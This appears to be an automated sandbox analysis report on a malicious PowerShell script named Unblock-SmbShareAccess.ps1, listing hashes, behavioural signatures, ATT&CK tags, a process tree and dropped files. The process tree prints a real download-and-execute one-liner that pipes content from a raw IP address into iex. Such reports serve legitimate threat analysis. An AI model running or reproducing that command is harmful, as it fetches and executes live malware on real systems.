fb98c0e8dccab7fda59884315e58c6d5d02973afacd0bcefa0815a0b4120a525

Analysis

max time kernel
122s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
25/02/2025, 11:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Unblock-SmbShareAccess.ps1
Size

590KB
MD5

7c52de594912ffa15f42f924e2acf2ca
SHA1

45904eac9bee719dec69571239c0362d0d80a8f6
SHA256

fb98c0e8dccab7fda59884315e58c6d5d02973afacd0bcefa0815a0b4120a525
SHA512

b75d31a98aaf82073debc94b74b7c133b36ad672372014e63bf12f78c1d8bfb243a03e824afc19fc418c00126307b6629d6109aae84b5edb3dbad163beea2364
SSDEEP

12288:AxyY2NdmJQ1XxHyOIHeOaNyXUx4RcsTtu2++5ggc2r1tGBCWlgLOxj8l5/uLlc1L:2GsUqHeOaNyy4HX5Plr1tGUWl468xjko

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
26	2604	powershell.exe
27	2604	powershell.exe
30	2604	powershell.exe
32	3920	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2604	powershell.exe
3920	powershell.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	api.ipify.org
30	api.ipify.org

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2604	powershell.exe
2604	powershell.exe
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeBackupPrivilege	2604	powershell.exe
Token: SeIncreaseQuotaPrivilege	2604	powershell.exe
Token: SeSecurityPrivilege	2604	powershell.exe
Token: SeTakeOwnershipPrivilege	2604	powershell.exe
Token: SeLoadDriverPrivilege	2604	powershell.exe
Token: SeSystemProfilePrivilege	2604	powershell.exe
Token: SeSystemtimePrivilege	2604	powershell.exe
Token: SeProfSingleProcessPrivilege	2604	powershell.exe
Token: SeIncBasePriorityPrivilege	2604	powershell.exe
Token: SeCreatePagefilePrivilege	2604	powershell.exe
Token: SeBackupPrivilege	2604	powershell.exe
Token: SeRestorePrivilege	2604	powershell.exe
Token: SeShutdownPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeSystemEnvironmentPrivilege	2604	powershell.exe
Token: SeRemoteShutdownPrivilege	2604	powershell.exe
Token: SeUndockPrivilege	2604	powershell.exe
Token: SeManageVolumePrivilege	2604	powershell.exe
Token: 33	2604	powershell.exe
Token: 34	2604	powershell.exe
Token: 35	2604	powershell.exe
Token: 36	2604	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2604 wrote to memory of 3648	2604	powershell.exe	92
PID 2604 wrote to memory of 3648	2604	powershell.exe	92
PID 3648 wrote to memory of 4600	3648	csc.exe	93
PID 3648 wrote to memory of 4600	3648	csc.exe	93
PID 2604 wrote to memory of 3920	2604	powershell.exe	96
PID 2604 wrote to memory of 3920	2604	powershell.exe	96
PID 2604 wrote to memory of 4844	2604	powershell.exe	99
PID 2604 wrote to memory of 4844	2604	powershell.exe	99
PID 4844 wrote to memory of 2348	4844	csc.exe	100
PID 4844 wrote to memory of 2348	4844	csc.exe	100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\Unblock-SmbShareAccess.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\02xw3te4\02xw3te4.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3648
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7D6.tmp" "c:\Users\Admin\AppData\Local\Temp\02xw3te4\CSC43D9FB2DEE4843818DEE6B4EF9B6D93.TMP"
    3⤵
    PID:4600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c curl -useb 104.194.222.166/1.php?s=boicn| iex
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3920
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrj1looo\xrj1looo.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4844
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF359.tmp" "c:\Users\Admin\AppData\Local\Temp\xrj1looo\CSCA30A24266A334D64B35BA88716CF0C6.TMP"
    3⤵
    PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\02xw3te4\02xw3te4.dll

Filesize
5KB

MD5
a71c426b32b7ab4656373b37ce929d08

SHA1
1974268fc9e83f5ef277bf969d949b7c900ebd59

SHA256
1c4d40178e17505838a260e5716f87ce3f0944f0a536641db292d5ba2ba1286e

SHA512
dcd7450b5d66f02e35914bcbcd7e652ba4f3a73c93f9834e73494481e0be7b09b416eaf3bc37d11bd2113679607557ee0266503055176988c55282d9caa349e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB7D6.tmp

Filesize
1KB

MD5
92558e200dee497eedd7565a7f6faeb0

SHA1
6eb090891a6d46b50b636f936740d3dcd2949599

SHA256
a190f29a9b9c0c63565804005759312b7b7b82e31dcc01debb9b38c418ec4e94

SHA512
cbc911f4420d34c71fe97bce82a8d4288c9c9bc280e9a6cc8585d7a77a243e390a81dfcecdc00a51f5857e8b9b1201087ecb9fc6fdb3c217e49a599fdab44206

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF359.tmp

Filesize
1KB

MD5
c4ab17a91ec6edc204c8e0a3e91405c0

SHA1
337f8dab8e597d9a9d058f3093a03a097f1b5956

SHA256
c69c1fb934301378623fbccae1128d6878aa0190dcb79dd58d188bb4cda952cd

SHA512
04b4edd27bb8a7d14b2739f536ad235ade7bfe5f8ae131f8c1b0c3581a3686cb9cea147978c407456fe2c70c26716da2842e37d2fa4fa82943fcd3ddc36b8255

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jikqnyc3.qwg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xrj1looo\xrj1looo.dll

Filesize
7KB

MD5
148bcf283a0fa0a31723baa306790e15

SHA1
c55658289b7cea2f93affc01d6ebe5574bf206af

SHA256
bd69a9582c181d0fd9190e87b47f68d1b1a5feb54decaecb310a7833ff13cd5e

SHA512
3f9fb92a86efcfd7ea406a87d126aa8820af84a87c538f562cecc91361796545e87e0da5d1471578b0edc075e7eedf66014568f054f0038593e0bddfb7458f67

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\02xw3te4\02xw3te4.0.cs

Filesize
1KB

MD5
eb6e477894cae09846b2fde1f2d52055

SHA1
8b51c3688e50c6e256a134a67d4016bbaa46ba84

SHA256
058bd188aeb4edead1cdf0e45740385a691882eee49ea77ed7c97d336514f06c

SHA512
c53c855d300f10d0d44fd5b3615878ff3b2091bfb58aa7782856f459128a235f4b3f6554089c51adb9e2d90dbe013c2e02883bc3c5c56547e2fbb20649e285db

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\02xw3te4\02xw3te4.cmdline

Filesize
369B

MD5
fab7aebecfe52d035397e4e8b5273baa

SHA1
80582f8f94713f943306255d2a8c1ad5b7cd9572

SHA256
4514a2dfe327f07dcb8c94264305b7fbd6b65f6854e727f7fdca003a05620d09

SHA512
dc041b88bf2e271f10fea733ebc4bf49aab48b135753f20798a4c233684088e85c8a85ea2aba4e09aa67591a077050986b903b7dda383309a01d4d0c2bb43619

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\02xw3te4\CSC43D9FB2DEE4843818DEE6B4EF9B6D93.TMP

Filesize
652B

MD5
db2f285b3cfc272f75872041ed664140

SHA1
dabbe279ed0843053c9fc308e525373d98db21f0

SHA256
feb51625ec7abb61e920f68d5f988a65d86daae0851d66ee0b580bf75c4c8d45

SHA512
11489a69409ec9ea10f6046daa26e5c2798ec5f9064e4943a2d71a32a86f75efa60ce02c1b0b9e7ba5d2d463b088db18b5d0818ee8d519fc491a7d2de0736e51

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xrj1looo\CSCA30A24266A334D64B35BA88716CF0C6.TMP

Filesize
652B

MD5
62fb8ac13f7fa82fa8e360a611a6a258

SHA1
e20f1c8476b9293f56f34b6014361791001680d5

SHA256
bd77cff2b06d77191ec55e105b35b88ac5b81012399e7db70ac15ce351e1a712

SHA512
cf40f077f74cd09a8e75e0527060d4a77613419be57aa56941dc49103fcdb4bec6a5232b0cfb34a0f741f5bc79eb57440eef906f586ee4dac66832ca533a669a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xrj1looo\xrj1looo.0.cs

Filesize
9KB

MD5
36378af3e9cadd94ced6728517519bc9

SHA1
dc7f2e57900ccbe97f4c80bb5467d0c62dee22f8

SHA256
dceeef4a04ad74f7274337fac4bb19cd95a3e38d14189f7095dd9e7e416573db

SHA512
0287158ffe1ef65cd56cddfc2a7c7f09fcb88715f0bdeb2fd4b75ab5251d0d03d900577c5a4a87ec5d379983589cc0ec1cbf6be5585c61745d054fc90405d635

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xrj1looo\xrj1looo.cmdline

Filesize
369B

MD5
4cffa426557372b8ce60b8d08a481c9f

SHA1
9139adf7867bba13a143fa6310c009eb4960d21b

SHA256
916038547a73618465c3d11979697708e1420ad6355fe9b2313c1ba80b33dea2

SHA512
efaf3c3f0b23961846148274f65d0b4137f56984db7e3a989964e1abd5526503d46b84ccf0c98543dc7c8538047b3f7b3b6606a9db111451c95ca1493d21e66a

Download Submit
memory/2604-14-0x00000211A1BB0000-0x00000211A1BC2000-memory.dmp

Filesize
72KB

Download
memory/2604-36-0x00007FF9D10D0000-0x00007FF9D1B91000-memory.dmp

Filesize
10.8MB

Download
memory/2604-29-0x00007FF9D10D3000-0x00007FF9D10D5000-memory.dmp

Filesize
8KB

Download
memory/2604-30-0x00007FF9D10D0000-0x00007FF9D1B91000-memory.dmp

Filesize
10.8MB

Download
memory/2604-31-0x00007FF9D10D0000-0x00007FF9D1B91000-memory.dmp

Filesize
10.8MB

Download
memory/2604-34-0x00000211A4700000-0x00000211A48C2000-memory.dmp

Filesize
1.8MB

Download
memory/2604-35-0x00000211A4E00000-0x00000211A5328000-memory.dmp

Filesize
5.2MB

Download
memory/2604-27-0x0000021189690000-0x0000021189698000-memory.dmp

Filesize
32KB

Download
memory/2604-48-0x00007FF9D10D0000-0x00007FF9D1B91000-memory.dmp

Filesize
10.8MB

Download
memory/2604-49-0x00007FF9D10D0000-0x00007FF9D1B91000-memory.dmp

Filesize
10.8MB

Download
memory/2604-0-0x00007FF9D10D3000-0x00007FF9D10D5000-memory.dmp

Filesize
8KB

Download
memory/2604-13-0x00007FF9D10D0000-0x00007FF9D1B91000-memory.dmp

Filesize
10.8MB

Download
memory/2604-12-0x00007FF9D10D0000-0x00007FF9D1B91000-memory.dmp

Filesize
10.8MB

Download
memory/2604-11-0x00007FF9D10D0000-0x00007FF9D1B91000-memory.dmp

Filesize
10.8MB

Download
memory/2604-62-0x00000211A49A0000-0x00000211A49A8000-memory.dmp

Filesize
32KB

Download
memory/2604-10-0x0000021189660000-0x0000021189682000-memory.dmp

Filesize
136KB

Download